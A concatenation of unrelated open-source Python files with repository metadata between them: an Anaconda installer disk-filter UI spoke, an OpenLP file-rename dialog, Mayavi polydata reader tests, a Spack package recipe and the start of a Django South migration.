# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Chris Lumens <clumens@redhat.com>
#
from collections import namedtuple
import itertools
from blivet import arch
from blivet.devices import DASDDevice, FcoeDiskDevice, iScsiDiskDevice, MultipathDevice, ZFCPDiskDevice
from blivet.fcoe import has_fcoe
from pyanaconda.flags import flags
from pyanaconda.i18n import CN_, CP_
from pyanaconda.ui.lib.disks import getDisks, isLocalDisk
from pyanaconda.ui.gui.spokes import NormalSpoke
from pyanaconda.ui.gui.spokes.advstorage.fcoe import FCoEDialog
from pyanaconda.ui.gui.spokes.advstorage.iscsi import ISCSIDialog
from pyanaconda.ui.gui.spokes.advstorage.dasd import DASDDialog
from pyanaconda.ui.gui.spokes.lib.cart import SelectedDisksDialog
from pyanaconda.ui.categories.system import SystemCategory
__all__ = ["FilterSpoke"]
DiskStoreRow = namedtuple("DiskStoreRow", ["visible", "selected", "mutable",
"name", "type", "model", "capacity",
"vendor", "interconnect", "serial",
"wwid", "paths", "port", "target",
"lun", "ccw"])
class FilterPage(object):
"""A FilterPage is the logic behind one of the notebook tabs on the filter
UI spoke. Each page has its own specific filtered model overlaid on top
of a common model that holds all non-advanced disks.
A Page is created once, when the filter spoke is initialized. It is
       set up multiple times - each time the spoke is revisited. When the Page
       is set up, it is given a complete view of all disks that belong on this
Page. This is because certain pages may require populating a combo with
all vendor names, or other similar tasks.
This class is just a base class. One subclass should be created for each
more specialized type of page. Only one instance of each subclass should
ever be created.
"""
def __init__(self, storage, builder):
"""Create a new FilterPage instance.
Instance attributes:
builder -- A reference to the Gtk.Builder instance containing
this page's UI elements.
filterActive -- Whether the user has chosen to filter results down
on this page. If set, visible_func should take the
filter UI elements into account.
storage -- An instance of a blivet object.
"""
self.builder = builder
self.storage = storage
self.model = None
self.filterActive = False
    def ismember(self, device):
        """Does device belong on this page? This function should take into
           account what kind of thing the device is. It should not be concerned
with any sort of filtering settings. It only determines whether
device belongs.
"""
return True
def setup(self, store, selectedNames, disks):
"""Do whatever setup of the UI is necessary before this page can be
displayed. This function is called every time the filter spoke
is revisited, and thus must first do any cleanup that is necessary.
The setup function is passed a reference to the master store, a list
of names of disks the user has selected (either from a previous visit
or via kickstart), and a list of all disk objects that belong on this
page as determined from the ismember method.
At the least, this method should add all the disks to the store. It
may also need to populate combos and other lists as appropriate.
"""
pass
def clear(self):
"""Blank out any filtering-related fields on this page and return them
to their defaults. This is called when the Clear button is clicked.
"""
pass
def visible_func(self, model, itr, *args):
"""This method is called for every row (disk) in the store, in order to
determine if it should be displayed on this page or not. This method
should take into account whether filterActive is set, perhaps whether
something in pyanaconda.flags is setup, and other settings to make
a final decision. Because filtering can be complicated, many pages
will want to farm this decision out to another method.
The return value is a boolean indicating whether the row is visible
or not.
"""
return True
def setupCombo(self, combo, items):
"""Populate a given GtkComboBoxText instance with a list of items. The
combo will first be cleared, so this method is suitable for calling
repeatedly. The first item in the list will be selected by default.
"""
combo.remove_all()
for i in sorted(items):
combo.append_text(i)
if items:
combo.set_active(0)
def _long_identifier(self, disk):
# For iSCSI devices, we want the long ip-address:port-iscsi-tgtname-lun-XX
# identifier, but blivet doesn't expose that in any useful way and I don't
# want to go asking udev. Instead, we dig around in the deviceLinks and
# default to the name if we can't figure anything else out.
for link in disk.deviceLinks:
if "by-path" in link:
lastSlash = link.rindex("/")+1
return link[lastSlash:]
return disk.name
class SearchPage(FilterPage):
def __init__(self, storage, builder):
FilterPage.__init__(self, storage, builder)
self.model = self.builder.get_object("searchModel")
self.model.set_visible_func(self.visible_func)
self._lunEntry = self.builder.get_object("searchLUNEntry")
self._wwidEntry = self.builder.get_object("searchWWIDEntry")
self._combo = self.builder.get_object("searchTypeCombo")
self._portCombo = self.builder.get_object("searchPortCombo")
self._targetEntry = self.builder.get_object("searchTargetEntry")
def setup(self, store, selectedNames, disks):
self._combo.set_active(0)
self._combo.emit("changed")
ports = []
for disk in disks:
if hasattr(disk, "node"):
ports.append(str(disk.node.port))
self.setupCombo(self.builder.get_object("searchPortCombo"), ports)
def clear(self):
self._lunEntry.set_text("")
self._portCombo.set_active(0)
self._targetEntry.set_text("")
self._wwidEntry.set_text("")
def _port_equal(self, device):
active = self._portCombo.get_active_text()
if active and hasattr(device, "node"):
return device.node.port == active
else:
return True
def _target_equal(self, device):
active = self._targetEntry.get_text().strip()
if active:
return active in getattr(device, "initiator", "")
else:
return True
def _lun_equal(self, device):
active = self._lunEntry.get_text().strip()
if active and hasattr(device, "node"):
try:
return int(active) == device.node.tpgt
except ValueError:
return True
else:
return True
def _filter_func(self, device):
if not self.filterActive:
return True
filterBy = self._combo.get_active()
if filterBy == 0:
return True
elif filterBy == 1:
return self._port_equal(device) and self._target_equal(device) and self._lun_equal(device)
elif filterBy == 2:
return self._wwidEntry.get_text() in getattr(device, "wwid", self._long_identifier(device))
elif filterBy == 3:
return hasattr(device, "fcp_lun") and self._lunEntry.get_text() in device.fcp_lun
def visible_func(self, model, itr, *args):
obj = DiskStoreRow(*model[itr])
device = self.storage.devicetree.getDeviceByName(obj.name, hidden=True)
return self._filter_func(device)
class MultipathPage(FilterPage):
def __init__(self, storage, builder):
FilterPage.__init__(self, storage, builder)
self.model = self.builder.get_object("multipathModel")
self.model.set_visible_func(self.visible_func)
self._combo = self.builder.get_object("multipathTypeCombo")
self._icCombo = self.builder.get_object("multipathInterconnectCombo")
self._vendorCombo = self.builder.get_object("multipathVendorCombo")
self._wwidEntry = self.builder.get_object("multipathWWIDEntry")
def ismember(self, device):
return isinstance(device, MultipathDevice)
def setup(self, store, selectedNames, disks):
vendors = []
interconnects = []
for disk in disks:
paths = [d.name for d in disk.parents]
selected = disk.name in selectedNames
store.append([True, selected, not disk.protected,
disk.name, "", disk.model, str(disk.size),
disk.vendor, disk.bus, disk.serial,
disk.wwid, "\n".join(paths), "", "",
"", ""])
            if disk.vendor not in vendors:
                vendors.append(disk.vendor)
            if disk.bus not in interconnects:
                interconnects.append(disk.bus)
self._combo.set_active(0)
self._combo.emit("changed")
self.setupCombo(self._vendorCombo, vendors)
self.setupCombo(self._icCombo, interconnects)
def clear(self):
self._icCombo.set_active(0)
self._vendorCombo.set_active(0)
self._wwidEntry.set_text("")
def _filter_func(self, device):
if not self.filterActive:
return True
filterBy = self._combo.get_active()
if filterBy == 0:
return True
elif filterBy == 1:
return device.vendor == self._vendorCombo.get_active_text()
elif filterBy == 2:
return device.bus == self._icCombo.get_active_text()
elif filterBy == 3:
return self._wwidEntry.get_text() in device.wwid
def visible_func(self, model, itr, *args):
if not flags.mpath:
return False
obj = DiskStoreRow(*model[itr])
device = self.storage.devicetree.getDeviceByName(obj.name, hidden=True)
return self.ismember(device) and self._filter_func(device)
class OtherPage(FilterPage):
def __init__(self, storage, builder):
FilterPage.__init__(self, storage, builder)
self.model = self.builder.get_object("otherModel")
self.model.set_visible_func(self.visible_func)
self._combo = self.builder.get_object("otherTypeCombo")
self._icCombo = self.builder.get_object("otherInterconnectCombo")
self._idEntry = self.builder.get_object("otherIDEntry")
self._vendorCombo = self.builder.get_object("otherVendorCombo")
def ismember(self, device):
return isinstance(device, iScsiDiskDevice) or isinstance(device, FcoeDiskDevice)
def setup(self, store, selectedNames, disks):
vendors = []
interconnects = []
for disk in disks:
selected = disk.name in selectedNames
if hasattr(disk, "node"):
port = str(disk.node.port)
lun = str(disk.node.tpgt)
else:
port = ""
lun = ""
store.append([True, selected, not disk.protected,
disk.name, "", disk.model, str(disk.size),
disk.vendor, disk.bus, disk.serial,
self._long_identifier(disk), "", port, getattr(disk, "initiator", ""),
lun, ""])
            if disk.vendor not in vendors:
                vendors.append(disk.vendor)
            if disk.bus not in interconnects:
                interconnects.append(disk.bus)
self._combo.set_active(0)
self._combo.emit("changed")
self.setupCombo(self._vendorCombo, vendors)
self.setupCombo(self._icCombo, interconnects)
def clear(self):
self._icCombo.set_active(0)
self._idEntry.set_text("")
self._vendorCombo.set_active(0)
def _filter_func(self, device):
if not self.filterActive:
return True
filterBy = self._combo.get_active()
if filterBy == 0:
return True
elif filterBy == 1:
return device.vendor == self._vendorCombo.get_active_text()
elif filterBy == 2:
return device.bus == self._icCombo.get_active_text()
elif filterBy == 3:
for link in device.deviceLinks:
if "by-path" in link:
return self._idEntry.get_text().strip() in link
return False
def visible_func(self, model, itr, *args):
obj = DiskStoreRow(*model[itr])
device = self.storage.devicetree.getDeviceByName(obj.name, hidden=True)
return self.ismember(device) and self._filter_func(device)
class ZPage(FilterPage):
def __init__(self, storage, builder):
FilterPage.__init__(self, storage, builder)
self.model = self.builder.get_object("zModel")
self.model.set_visible_func(self.visible_func)
self._isS390 = arch.isS390()
def ismember(self, device):
return isinstance(device, ZFCPDiskDevice) or isinstance(device, DASDDevice)
def setup(self, store, selectedNames, disks):
if not self._isS390:
return
def visible_func(self, model, itr, *args):
obj = DiskStoreRow(*model[itr])
device = self.storage.devicetree.getDeviceByName(obj.name, hidden=True)
return self.ismember(device)
class FilterSpoke(NormalSpoke):
builderObjects = ["diskStore", "filterWindow",
"searchModel", "multipathModel", "otherModel", "zModel"]
mainWidgetName = "filterWindow"
uiFile = "spokes/filter.glade"
helpFile = "FilterSpoke.xml"
category = SystemCategory
title = CN_("GUI|Spoke", "_INSTALLATION DESTINATION")
def __init__(self, *args):
NormalSpoke.__init__(self, *args)
self.applyOnSkip = True
self.ancestors = []
self.disks = []
self.selected_disks = []
@property
def indirect(self):
return True
# This spoke has no status since it's not in a hub
@property
def status(self):
return None
def apply(self):
onlyuse = self.selected_disks[:]
for disk in [d for d in self.storage.disks if d.name in onlyuse]:
onlyuse.extend([d.name for d in disk.ancestors
if d.name not in onlyuse])
self.data.ignoredisk.onlyuse = onlyuse
self.data.clearpart.drives = self.selected_disks[:]
def initialize(self):
NormalSpoke.initialize(self)
self.pages = [SearchPage(self.storage, self.builder),
MultipathPage(self.storage, self.builder),
OtherPage(self.storage, self.builder),
ZPage(self.storage, self.builder)]
self._notebook = self.builder.get_object("advancedNotebook")
if not arch.isS390():
self._notebook.remove_page(-1)
self.builder.get_object("addZFCPButton").destroy()
self.builder.get_object("addDASDButton").destroy()
if not has_fcoe():
self.builder.get_object("addFCOEButton").destroy()
self._store = self.builder.get_object("diskStore")
self._addDisksButton = self.builder.get_object("addDisksButton")
def _real_ancestors(self, disk):
# Return a list of all the ancestors of a disk, but remove the disk
# itself from this list.
return [d for d in disk.ancestors if d.name != disk.name]
def refresh(self):
NormalSpoke.refresh(self)
self.disks = getDisks(self.storage.devicetree)
self.selected_disks = self.data.ignoredisk.onlyuse[:]
self.ancestors = itertools.chain(*map(self._real_ancestors, self.disks))
self.ancestors = map(lambda d: d.name, self.ancestors)
self._store.clear()
allDisks = []
multipathDisks = []
otherDisks = []
zDisks = []
        # Now add all the non-local disks to the store. Everything has been set up
# ahead of time, so there's no need to configure anything. We first make
# these lists of disks, then call setup on each individual page. This is
# because there could be page-specific setup to do that requires a complete
# view of all the disks on that page.
for disk in itertools.ifilterfalse(isLocalDisk, self.disks):
if self.pages[1].ismember(disk):
multipathDisks.append(disk)
elif self.pages[2].ismember(disk):
otherDisks.append(disk)
elif self.pages[3].ismember(disk):
zDisks.append(disk)
allDisks.append(disk)
self.pages[0].setup(self._store, self.selected_disks, allDisks)
self.pages[1].setup(self._store, self.selected_disks, multipathDisks)
self.pages[2].setup(self._store, self.selected_disks, otherDisks)
self.pages[3].setup(self._store, self.selected_disks, zDisks)
self._update_summary()
def _update_summary(self):
summaryButton = self.builder.get_object("summary_button")
label = self.builder.get_object("summary_button_label")
# We need to remove ancestor devices from the count. Otherwise, we'll
# end up in a situation where selecting one multipath device could
# potentially show three devices selected (mpatha, sda, sdb for instance).
count = len([disk for disk in self.selected_disks if disk not in self.ancestors])
summary = CP_("GUI|Installation Destination|Filter",
"%d _storage device selected",
"%d _storage devices selected",
count) % count
label.set_text(summary)
label.set_use_underline(True)
summaryButton.set_visible(count > 0)
label.set_sensitive(count > 0)
def on_back_clicked(self, button):
self.skipTo = "StorageSpoke"
NormalSpoke.on_back_clicked(self, button)
def on_summary_clicked(self, button):
dialog = SelectedDisksDialog(self.data)
# Include any disks selected in the initial storage spoke, plus any
# selected in this filter UI.
disks = [disk for disk in self.disks if disk.name in self.selected_disks]
free_space = self.storage.getFreeSpace(disks=disks)
with self.main_window.enlightbox(dialog.window):
dialog.refresh(disks, free_space, showRemove=False, setBoot=False)
dialog.run()
def on_find_clicked(self, button):
n = self._notebook.get_current_page()
self.pages[n].filterActive = True
self.pages[n].model.refilter()
def on_clear_clicked(self, button):
n = self._notebook.get_current_page()
self.pages[n].filterActive = False
self.pages[n].model.refilter()
self.pages[n].clear()
def on_page_switched(self, notebook, newPage, newPageNum, *args):
self.pages[newPageNum].model.refilter()
notebook.get_nth_page(newPageNum).show_all()
def on_row_toggled(self, button, path):
if not path:
return
page_index = self._notebook.get_current_page()
filter_model = self.pages[page_index].model
model_itr = filter_model.get_iter(path)
itr = filter_model.convert_iter_to_child_iter(model_itr)
self._store[itr][1] = not self._store[itr][1]
if self._store[itr][1] and self._store[itr][3] not in self.selected_disks:
self.selected_disks.append(self._store[itr][3])
elif not self._store[itr][1] and self._store[itr][3] in self.selected_disks:
self.selected_disks.remove(self._store[itr][3])
self._update_summary()
def on_add_iscsi_clicked(self, widget, *args):
dialog = ISCSIDialog(self.data, self.storage)
with self.main_window.enlightbox(dialog.window):
dialog.refresh()
dialog.run()
# We now need to refresh so any new disks picked up by adding advanced
# storage are displayed in the UI.
self.refresh()
def on_add_fcoe_clicked(self, widget, *args):
dialog = FCoEDialog(self.data, self.storage)
with self.main_window.enlightbox(dialog.window):
dialog.refresh()
dialog.run()
# We now need to refresh so any new disks picked up by adding advanced
# storage are displayed in the UI.
self.refresh()
def on_add_zfcp_clicked(self, widget, *args):
pass
def on_add_dasd_clicked(self, widget, *args):
dialog = DASDDialog(self.data, self.storage)
with self.main_window.enlightbox(dialog.window):
dialog.refresh()
dialog.run()
# We now need to refresh so any new disks picked up by adding advanced
# storage are displayed in the UI.
self.refresh()
##
## SEARCH TAB SIGNAL HANDLERS
##
def on_search_type_changed(self, combo):
ndx = combo.get_active()
notebook = self.builder.get_object("searchTypeNotebook")
findButton = self.builder.get_object("searchFindButton")
clearButton = self.builder.get_object("searchClearButton")
findButton.set_sensitive(ndx != 0)
clearButton.set_sensitive(ndx != 0)
notebook.set_current_page(ndx)
##
## MULTIPATH TAB SIGNAL HANDLERS
##
def on_multipath_type_changed(self, combo):
ndx = combo.get_active()
notebook = self.builder.get_object("multipathTypeNotebook")
findButton = self.builder.get_object("multipathFindButton")
clearButton = self.builder.get_object("multipathClearButton")
findButton.set_sensitive(ndx != 0)
clearButton.set_sensitive(ndx != 0)
notebook.set_current_page(ndx)
##
## OTHER TAB SIGNAL HANDLERS
##
def on_other_type_combo_changed(self, combo):
ndx = combo.get_active()
notebook = self.builder.get_object("otherTypeNotebook")
findButton = self.builder.get_object("otherFindButton")
clearButton = self.builder.get_object("otherClearButton")
findButton.set_sensitive(ndx != 0)
clearButton.set_sensitive(ndx != 0)
notebook.set_current_page(ndx)
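# Note: the three *_type_changed handlers above are intentionally identical
# in shape: combo index 0 means "no search criterion selected", so the
# Find/Clear buttons stay insensitive and the criterion notebook simply
# mirrors the combo selection.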
|
itoed/anaconda
|
pyanaconda/ui/gui/spokes/filter.py
|
Python
|
gpl-2.0
| 23,725
|
[
"VisIt"
] |
2f99f5c96ab3473448ec421da998c88d6077b594a2014acfded032e5582866b7
|
# -*- coding: utf-8 -*-
# vim: autoindent shiftwidth=4 expandtab textwidth=120 tabstop=4 softtabstop=4
###############################################################################
# OpenLP - Open Source Lyrics Projection #
# --------------------------------------------------------------------------- #
# Copyright (c) 2008-2013 Raoul Snyman #
# Portions copyright (c) 2008-2013 Tim Bentley, Gerald Britton, Jonathan #
# Corwin, Samuel Findlay, Michael Gorven, Scott Guerrieri, Matthias Hub, #
# Meinert Jordan, Armin Köhler, Erik Lundin, Edwin Lunando, Brian T. Meyer. #
# Joshua Miller, Stevan Pettit, Andreas Preikschat, Mattias Põldaru, #
# Christian Richter, Philip Ridout, Simon Scudder, Jeffrey Smith, #
# Maikel Stuivenberg, Martin Thompson, Jon Tibble, Dave Warnock, #
# Frode Woldsund, Martin Zibricky, Patrick Zimmermann #
# --------------------------------------------------------------------------- #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation; version 2 of the License. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; if not, write to the Free Software Foundation, Inc., 59 #
# Temple Place, Suite 330, Boston, MA 02111-1307 USA #
###############################################################################
"""
The file rename dialog.
"""
from PyQt4 import QtGui
from filerenamedialog import Ui_FileRenameDialog
from openlp.core.lib import translate
class FileRenameForm(QtGui.QDialog, Ui_FileRenameDialog):
"""
The file rename dialog
"""
def __init__(self, parent):
"""
Constructor
"""
QtGui.QDialog.__init__(self, parent)
self.setupUi(self)
def exec_(self, copy=False):
"""
Run the Dialog with correct heading.
"""
if copy:
self.setWindowTitle(translate('OpenLP.FileRenameForm', 'File Copy'))
else:
self.setWindowTitle(translate('OpenLP.FileRenameForm', 'File Rename'))
return QtGui.QDialog.exec_(self)
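# Typical usage (illustrative sketch; ``file_name_edit`` is assumed to be a
# line edit provided by Ui_FileRenameDialog, not something defined here):
#   form = FileRenameForm(parent_window)
#   if form.exec_(copy=True) == QtGui.QDialog.Accepted:
#       new_name = form.file_name_edit.text()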
|
marmyshev/transitions
|
openlp/core/ui/filerenameform.py
|
Python
|
gpl-2.0
| 2,842
|
[
"Brian"
] |
264fea9242d72451cebdf81356acf8d3f4fed5fa164fe3490e5afe8a9c94a647
|
# Author: Suyog Dutt Jain <suyog.jain@aero.iitb.ac.in>
# Copyright (c) 2009-2015, Enthought, Inc.
# License: BSD Style.
# Standard library imports.
import unittest
# Local imports.
from .common import get_example_data
# Enthought library imports
from mayavi.sources.poly_data_reader import PolyDataReader
from mayavi.tests.data_reader_test_base import DataReaderTestBase
# External library imports
import vtk
vtk_major_version = vtk.vtkVersion.GetVTKMajorVersion()
vtk_minor_version = vtk.vtkVersion.GetVTKMinorVersion()
class TestPDBReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a PDB data file.
r = PolyDataReader()
r.initialize(get_example_data('caffeine.pdb'))
self.e.add_source(r)
self.bounds = (3.10, 10.78, -2.39, 4.03, -10.60, -6.31)
def test_pdb_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
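# The remaining test classes below repeat the same recipe for other polydata
# formats; a generic sketch (the file name and bounds are placeholders):
#   class TestFooReader(DataReaderTestBase):
#       def setup_reader(self):
#           r = PolyDataReader()
#           r.initialize(get_example_data('example.foo'))
#           self.e.add_source(r)
#           self.bounds = (0.0, 1.0, 0.0, 1.0, 0.0, 1.0)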
class TestBYUReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a BYU data file.
r = PolyDataReader()
r.initialize(get_example_data('cow.g'))
self.e.add_source(r)
self.bounds = (-4.445, 5.998, -3.608, 2.760, -1.690, 1.690)
def test_byu_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestOBJReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read an OBJ data file.
r = PolyDataReader()
r.initialize(get_example_data('shuttle.obj'))
self.e.add_source(r)
self.bounds = (-7.65, 7.04, -4.68, 4.68, -1.35, 4.16)
def test_obj_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestParticleReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a Particle data file.
r = PolyDataReader()
r.initialize(get_example_data('Particles.raw'))
self.e.add_source(r)
r.reader.set(data_byte_order='big_endian', data_type='float', file_type='binary')
self.bounds = (817.33, 826.09, 545.02, 571.02, 1443.48, 1511.18)
def test_particle_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestPLYReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a PLY data file.
r = PolyDataReader()
r.initialize(get_example_data('pyramid.ply'))
self.e.add_source(r)
self.bounds = (0.0, 1.0, 0.0, 1.0, 0.0, 1.60)
def test_ply_data_reader(self):
"Test if the test fixture works"
if vtk_major_version == 5 and vtk_minor_version in [6, 8]:
raise unittest.SkipTest('PLY reader broken in this version of VTK')
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
if vtk_major_version == 5 and vtk_minor_version in [6, 8]:
raise unittest.SkipTest('PLY reader broken in this version of VTK')
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
if vtk_major_version == 5 and vtk_minor_version in [6, 8]:
raise unittest.SkipTest('PLY reader broken in this version of VTK')
self.check_deepcopying(self.scene, self.bounds)
class TestPointsReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a Points data file.
r = PolyDataReader()
r.initialize(get_example_data('points.txt'))
self.e.add_source(r)
self.bounds = (0.0, 1.0, 0.0, 1.0, 0.0, 1.0)
def test_points_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestSTLReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read an STL data file.
r = PolyDataReader()
r.initialize(get_example_data('humanoid_tri.stla'))
self.e.add_source(r)
self.bounds = (0.60, 3.47, -3.96, 3.95, 3.05, 17.39)
def test_stl_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestFacetReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read a Facet data file.
r = PolyDataReader()
r.initialize(get_example_data('clown.facet'))
self.e.add_source(r)
self.bounds = (-0.5, 0.69, -0.49, 0.49, -1.09, 0.5)
def test_facet_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
class TestSLCReader(DataReaderTestBase):
def setup_reader(self):
""""Setup the reader in here. This is called after the engine
has been created and started. The engine is available as
self.e. This method is called by setUp().
"""
# Read an SLC data file.
r = PolyDataReader()
r.initialize(get_example_data('nut.slc'))
self.e.add_source(r)
self.bounds = (0.0, 67.0, 0.0, 40.0, 0.0, 58.0)
def test_slc_data_reader(self):
"Test if the test fixture works"
#Now test.
self.check(self.scene, self.bounds)
def test_save_and_restore(self):
"""Test if saving a visualization and restoring it works."""
self.check_saving(self.e, self.scene, self.bounds)
def test_deepcopied(self):
"""Test if the MayaVi2 visualization can be deep-copied."""
############################################################
# Test if the MayaVi2 visualization can be deep-copied.
self.check_deepcopying(self.scene, self.bounds)
if __name__ == '__main__':
unittest.main()
|
dmsurti/mayavi
|
mayavi/tests/test_poly_data_reader.py
|
Python
|
bsd-3-clause
| 10,834
|
[
"Mayavi",
"VTK"
] |
b1d80c0d8b6f1a428849aef5beb106bd1b0ebaa30d1dcd4ac6106fb6dc748f07
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RComplexheatmap(RPackage):
"""Complex heatmaps are efficient to visualize associations between
different sources of data sets and reveal potential structures. Here
the ComplexHeatmap package provides a highly flexible way to arrange
multiple heatmaps and supports self-defined annotation graphics."""
homepage = "https://bioconductor.org/packages/ComplexHeatmap/"
url = "https://git.bioconductor.org/packages/ComplexHeatmap"
list_url = homepage
version('1.14.0', git='https://git.bioconductor.org/packages/ComplexHeatmap', commit='0acd8974fb5cedde8cd96efea6dfa39324d25b34')
depends_on('r-circlize', type=('build', 'run'))
depends_on('r-getoptlong', type=('build', 'run'))
depends_on('r-colorspace', type=('build', 'run'))
depends_on('r-rcolorbrewer', type=('build', 'run'))
depends_on('r-dendextend', type=('build', 'run'))
depends_on('r-globaloptions', type=('build', 'run'))
depends_on('r@3.4.0:3.4.9', when='@1.14.0')
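# Once this recipe is on the Spack repo path, it is exercised with the usual
# workflow, e.g.:
#   spack info r-complexheatmap
#   spack install r-complexheatmap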
|
EmreAtes/spack
|
var/spack/repos/builtin/packages/r-complexheatmap/package.py
|
Python
|
lgpl-2.1
| 2,261
|
[
"Bioconductor"
] |
3f51ac0480195271dd3dc4da0f621bbe1e4bfcd76d2ed3bd97797726fa091703
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'NeuronEphysLink.num_reps'
db.add_column('neuroelectro_neuronephyslink', 'num_reps', self.gf('django.db.models.fields.IntegerField')(null=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'NeuronEphysLink.num_reps'
db.delete_column('neuroelectro_neuronephyslink', 'num_reps')
models = {
'neuroelectro.article': {
'Meta': {'object_name': 'Article'},
'abstract': ('django.db.models.fields.CharField', [], {'max_length': '10000', 'null': 'True'}),
'full_text_link': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Journal']", 'null': 'True'}),
'pmid': ('django.db.models.fields.IntegerField', [], {}),
'substances': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Substance']", 'null': 'True', 'symmetrical': 'False'}),
'terms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.MeshTerm']", 'null': 'True', 'symmetrical': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
